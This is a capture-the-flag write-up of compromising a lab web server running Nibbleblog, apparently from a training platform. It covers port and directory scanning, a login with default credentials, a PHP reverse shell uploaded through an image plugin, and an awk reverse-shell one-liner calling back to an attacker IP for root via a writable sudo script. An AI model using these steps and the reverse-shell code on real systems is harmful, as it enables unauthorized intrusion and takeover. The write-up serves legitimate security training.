My first step was to run Nmap against the machine to identify running services.
# Nmap 7.80 scan initiated Mon Nov 2 13:11:02 2020 as: nmap -p- -sV -sC -O -oN scan 10.10.10.75 Nmap scan report for 10.10.10.75 Host is up (0.022s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=11/2%OT=22%CT=1%CU=32093%PV=Y%DS=2%DC=I%G=Y%TM=5FA04C1 OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=8)SEQ OS:(SP=103%GCD=1%ISR=10F%TI=Z%CI=I%TS=8)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2= OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSN OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Nov 2 13:12:43 2020 -- 1 IP address (1 host up) scanned in 100.56 seconds
As you can see both SSH and port 80 were open. I decicded to first browse to port 80, where i was greeted with a page containing the text “Hello World!” viewing the page source showed there was a hidden comment:
<b>Hello world!</b> <!-- /nibbleblog/ directory. Nothing interesting here! -->
I browsed to the nibbleblog directory and was greeted with the following:
I then ran DIRB against the webserver to find hidden directories.
kali@kali:~$ dirb http://10.10.10.75/nibbleblog /usr/share/wordlists/dirb/big.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon Nov 2 13:17:36 2020 URL_BASE: http://10.10.10.75/nibbleblog/ WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt ----------------- GENERATED WORDS: 20458 ---- Scanning URL: http://10.10.10.75/nibbleblog/ ---- + http://10.10.10.75/nibbleblog/README (CODE:200|SIZE:4628) ==> DIRECTORY: http://10.10.10.75/nibbleblog/admin/ ==> DIRECTORY: http://10.10.10.75/nibbleblog/content/ ==> DIRECTORY: http://10.10.10.75/nibbleblog/languages/ ==> DIRECTORY: http://10.10.10.75/nibbleblog/plugins/ ==> DIRECTORY: http://10.10.10.75/nibbleblog/themes/ ---- Entering directory: http://10.10.10.75/nibbleblog/admin/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.75/nibbleblog/content/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.75/nibbleblog/languages/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.75/nibbleblog/plugins/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.75/nibbleblog/themes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Mon Nov 2 13:24:51 2020 DOWNLOADED: 20458 - FOUND: 1
From the output you can see that there were multiple directories found. Some of them even having directory listings enabled. The one I found of interest was the admin directory. Browsing to this displayed an admin login page. From here I was able to login using common credentials found via Google. (admin:nibbles)
I then discovered theĀ following website which describes the process of uploading a reverse shell via the image upload plugin. So i modified kali’s default php reverse shell from “/usr/share/webshells/php/php-reverse-shell.php” with my VPN tunnel IP address and to port 2600. I then browsed to Plugins, then the “My Image” plugin configuration page. And uploaded the shell using the form on that page.
The shell then uploads to http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
I started a netcat listener on port 2600 and browsed to that page to execute the reverse shell.
root@kali:/home/kali/Documents/nibbles# nc -nvlp 2600 listening on [any] 2600 ... connect to [10.10.14.24] from (UNKNOWN) [10.10.10.75] 56942 Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 14:43:24 up 6 min, 0 users, load average: 0.00, 0.02, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler) /bin/sh: 0: can't access tty; job control turned off $ cd home $ ls nibbler c$ d nibbler $ ls personal.zip user.txt $ cat user.txt [REDACTED] $
As you can see from the output. The reverse shell worked successfully and i was able to capture the user flag.
The enxt step was to esclate privilages to become root. This ended up being very simple. I ran the command sudo -L to see which commands can be run under sudo:
sudo -l Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
You can see from the output that /home/nibbler/personal/stuff/monitor.sh can be run using sudo without a password. As this is in the nibbler user directory it means we can write to this file. I created the /home/nibbler/personal/stuff/ directory then created a monitor.sh file with the following contents:
#! /bin/bash awk 'BEGIN {s = "/inet/tcp/0/10.10.14.23/2667"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
This creates a reverse shell to my kali machine on port 2667. I created a netcat listener on that port then ran monitor.sh under sudo:
cd /home/nibbler/personal/stuff ls monitor.sh sudo ./monitor.sh
root@kali:/home/kali/Documents/nibbles# nc -nvlp 2667 listening on [any] 2667 ... connect to [10.10.14.23] from (UNKNOWN) [10.10.10.75] 39924 shell>shell>whoami root shell>cat /root/root.txt [REDACTED] shell>
As you can see in the output. The reverse shell was successfully generated and I was able to capture the root flag.